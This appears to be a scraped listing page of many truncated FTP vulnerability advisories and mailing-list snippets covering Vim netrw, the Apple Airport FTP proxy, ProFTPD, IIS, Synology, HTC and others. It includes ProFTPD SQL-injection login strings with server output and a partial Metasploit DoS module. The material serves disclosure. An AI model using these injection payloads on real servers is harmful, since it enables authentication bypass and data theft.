Next Page >>
ftp
On 12/08/08 23:59, Jan Minář wrote:
> Vim: Netrw: FTP User Name and Password Disclosure
>
> 1. SUMMARY
>
> Product : Vim -- Vi IMproved
> Versions : Tested with Vim 7.1.266, 7.2, autoload/netrw.vim v131, v109
> Impact : Credentials disclosure
> Wherefrom: Remote
> Original : http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html
Vim: Netrw: FTP User Name and Password Disclosure
1. SUMMARY
Product : Vim -- Vi IMproved
Versions : Tested with Vim 7.1.266, 7.2, autoload/netrw.vim v131, v109
Impact : Credentials disclosure
Wherefrom: Remote
Original : http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html
HISPASEC
Security Advisory
http://blog.hispasec.com/lab/
Name : 2K7SEPT6 X-Diesel Unreal Commander v0.92 (build 573)
multiple FTP-based vulnerabilities
Class : Remote directory traversal, Remote DoS
Threat level : HIGH
Discovered : 2007-09-06
Published : 2007-08-24
Credit : Gynvael Coldwind
The FTP proxy used in Apple's Airport Express, Airport Extreme, Time Capsule and possibly elsewhere doesn't check the client provided address and port given by the FTP PORT command against the IP address of the connecting client, or against the use of privileged ports. (The FTP PORT command is used by a FTP client to tell an FTP server which address and data port to initiate the data connection on.) The FTP proxy is used to provide assistance to clients operating in NAT environments served by the Apple products. FTP servers running behind a NAT with this assistance can have addresses in the command channel rewritten for them so that external clients can reach them when operating in passive mode. The ALG operates as a proxy server, assuming responsibility for connections to the FTP server, and must therefore also handle and modify rewriting of the PORT command. It looks like it might be ftp-proxy from PF.
The effect of this problem is to allow anybody with access to the FTP port forwarded on the exterior side of an Apple Airport product that offers NAT to internal clients, which for a publicly-accessible FTP server is the big bad world, to induce an FTP server operating behind a NAT to send data to arbitrary addresses and ports. This is true even if the FTP server is configured to operate more securely, since it sees connections from the NAT's exterior interface, not the connecting client. This is useful for bouncing anonymous port scans off the victim NAT, or if data is available or can be written to and then read from the FTP server, potentially for anonymous attacks, spam, news floods, and other such badness. Any trust relationship and/or security implied or assumed by a NAT is also gone, since the PORT command can also specify private addresses, inside the NAT, for victimisation. Best of all, the gateway itself makes no log entry concerning FTP connections that have been run through the proxy.
Workarounds: do not use FTP; do not trigger the use of the ALG (FTP proxy) by explicitly using ports other than 21 on the inbound port mapping. If you can't do those things, you can avoid the worst effects of this attack by disabling FTP uploads that can later be downloaded by anonymous users.
Apple likes to keep secrets for the protection of its customers. Since the reasonable release of this advisory removes that protection, confidential information vouchsafed to me can be safely disclosed with no ill effects. Apple has a fix, and according to its last seemingly automatic template message, they are still testing it and do not know precisely when it will be released. This is confidential information. DO NOT DISCLOSE!
Advisory history:
Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/
Web commands injection through FTP Login in Synology Disk Station
CVE-2010-2453
INTRODUCTION
Synology Inc develops high-performance, reliable, versatile, and environmentally-friendly Network Attached Storage (NAS) products. Synology's goal
|------------------------------------------------------------------|
Advisory : CORELAN-10-004
Disclosure date : Jan 12, 2010
Corelan Reference :
http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-004-turboftp-server-1-00-712-dos/
0x00 : Vulnerability information
--------------------------------
HISPASEC
Security Advisory
http://blog.hispasec.com/lab/
Name : 2K7SEPT6 Magellan Explorer 3.32 build 2305 Remote FTP
Client Directory Traversal
Class : Remote Directory Traversal
Threat level : HIGH
Discovered : 2007-08-14
Published : 2007-09-06
HISPASEC
Security Advisory
http://blog.hispasec.com/lab/
Name : 2K7SEPT6 Total Commander 7.01 Remote FTP Client
Directory Traversal
Class : Remote Directory Traversal
Threat level : HIGH
Discovered : 2007-08-25
Published : 2007-09-06
XM Easy Personal FTP Server Multiple DoS vulnerabilities
Credits:
NeerajT of Nevis Labs
http://www.nevisnetworks.com/services.php?id=10
Date of Discovery: 14-May-2009
Vendor: Dxmsoft
URL: http://www.dxm2008.com/
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'XM Easy Personal FTP Server 5.8.0 Type DoS',
Looks like a very serious issue to me - it works on our ProFTPD
1.3.2rc2 Server (latest stable on gentoo).
220 ProFTPD 1.3.2rc2 Server (Pumpkin) [xx.xx.xx.xx]
USER %') and 1=2 union select
1,0x24312452565a583533784324716a304d4d6b4670426b4b486177644264756634392f,uid,gid,homedir,shell
from ftp #
331 Password required for %')
PASS 1
230 User %') and 1=2 union select
Microsoft FTP Client Multiple Bufferoverflow
Vulnerability
#####################################################################
XDisclose Advisory : XD100096
Vulnerability Discovered: November 20th 2007
Advisory Reported : November 28th 2007
Credit : Rajesh Sethumadhavan
http://www.security-database.com/toolswatch/AS-400-Auditing-Framework-Beta.html
5) Comments of note:
> ... some default services on AS/400 allow
> annonymous access including POP3, SMTP, LDAP, FTP, etc. But what
> fails audit almost every time are default passwords.
> ... security of these beasts had not been in forefront for
> most companies. Some of them run their e-commerce solutions on AS/400
> facing the Internet
Title: HTC / Android OBEX FTP Service Directory Traversal

Author: Alberto Moreno Tablado

Vendor: HTC

Products:

- HTC devices running Android 2.1

- HTC devices running Android 2.2
References: http://www.seguridadmobile.com/android/android-security/HTC-Android-OBEX-FTP-Service-Directory-Traversal.html
Summary:
HTC devices running Android 2.1 and Android 2.2 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and read arbitrary files, via a ../ in a pathname.
IBM AIX ftp domacro Parameter Buffer Overflow Vulnerability
iDefense Security Advisory 10.30.07
http://labs.idefense.com/intelligence/vulnerabilities/
Oct 30, 2007
I. BACKGROUND
The ftp program is a client application for accessing data stored on FTP
servers. This client is responsible for interfacing with users and
MITKRB5-SA-2011-005
MIT krb5 Security Advisory 2011-005
Original release: 2011-07-05
Topic: FTP daemon fails to set effective group ID
CVE-2011-1526
CVSSv2 Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P/E:H/RL:O/RC:C
Credits:
leinakesi[at]gmail.com
Vendor:
Turbo FTP Server
Affected:
Turbo FTP Server 1.20.745.
Earlier versions may also be affected.
Credits:
leinakesi[at]gmail.com
Vendor:
Core FTP mini-sftp-server
http://www.coreftp.com/server/index.html
Affected:
Core FTP mini-sftp-server version 1.19.
Earlier versions may also be affected.
Credits:
leinakesi[at]gmail.com
Vendor:
Core FTP
Affected:
Core FTP Server 1.0 build 347.
Earlier versions may also be affected.
Credits:zhangmc[at]mail.ustc.edu.cn
Vendor:
Ari Pikivirta
http://downstairs.dnsalias.net/homeftpserver.html
Affected:
Home FTP Server 1.10.1.139
Earlier versions may also be affected
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01446326
Version: 1
HPSBUX02334 SSRT071403 rev.1 - HP-UX Running ftp, Remote Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2008-05-12
Last Updated: 2008-05-12
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:http://security.FreeBSD.org/>.
I. Background
lukemftpd(8) is a general-purpose implementation of File Transfer Protocol
(FTP) server that is shipped with the FreeBSD base system. It is not enabled
in default installations but can be enabled as either an inetd(8) server,
or a standard-alone server.
A cross-site request forgery attack is a type of malicious exploit that is
Hi,
On Tue, 2009-02-10 at 19:49 +0000, gat3way@gat3way.eu wrote:
> Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like:
Could you please provide the version number which is affected by this?
Running ProFTPD Version: 1.3.0 (stable) on Linux (Debian etch) I cannot
reproduce your report.
> USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
>
Advisory: Google Chrome FTP PASV IP Malicious Port Scanning Vulnerability.
Version Affected:
Google Chrome: 1.0.154.36
Description:
Google Chrome FTP Client is vulnerable to FTP PASV malicious port
scanning vulnerability. The username in the
FTP (ftp://username:password@domain.com) can be manipulated by tampering
it with certain IP address with
bandwidths, convert requests between different proxy types,
authenticate, authorize, control, limit and account users access and
more.
3proxy 0.5.3j version was released, to address double free()
vulnerability in FTP proxy module (ftppr) reported by Venustech AD-LAB
(CVE-2007-5622). Vulnerable 3proxy versions are 0.5 - 0.5.3i. Current
branch (0.6) is not affected.
3proxy 0.5.3j can be downloaded from http://3proxy.ru/download/
____________________________________________________________________________
____
Vendor: Jscape, http://www.jscape.com/
Affected Products: Jscape Secure FTP Applet
http://www.jscape.com/sftpapplet/index.html
Vulnerability: SSH Host key is not verified allowing
man-in-the-middle attacks
Risk: Medium
____________________________________________________________________________
Credits:zhangmc[at]mail.ustc.edu.cn
Vendor: Dxmsoft
Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected
Overview:
XM Easy Personal FTP Server is a easy use FTP server Application. Denial of service vulnerability exists in XM Personal FTP Server that causes the application to crash when the "LIST" is sent to FTP server if you do not use "PASV" or "POST" first.
UVC products.
This issue is documented in Cisco bug ID CSCti54010 and has not been
assigned a CVE ID.
FTP Server Accessible by Default in Cisco UVC Products
+-----------------------------------------------------
The FTP server is enabled by default on Cisco UVC systems. An
attacker can leverage the FTP server to exploit other vulnerabilities
in this Cisco Security Response. Authentication is required to log
***** MS IIS FTPD DoS ZER0DAY *****
There is a DoS vulnerability in the globbing functionality of IIS FTPD.
Anonymous users can exploit this if they have read access to a directory!!!
Normal users can exploit this too if they can read a directory.
Example session where the anonymous user has read access to the folder "pub":
C:\Users\Nikolaos>ftp 192.168.2.102
Verbindung mit 192.168.2.102 wurde hergestellt.
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01446326
Version: 2
HPSBUX02334 SSRT071403 rev.2 - HP-UX Running ftp, Remote Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2008-05-12
Last Updated: 2008-05-28
Next Page>>
|
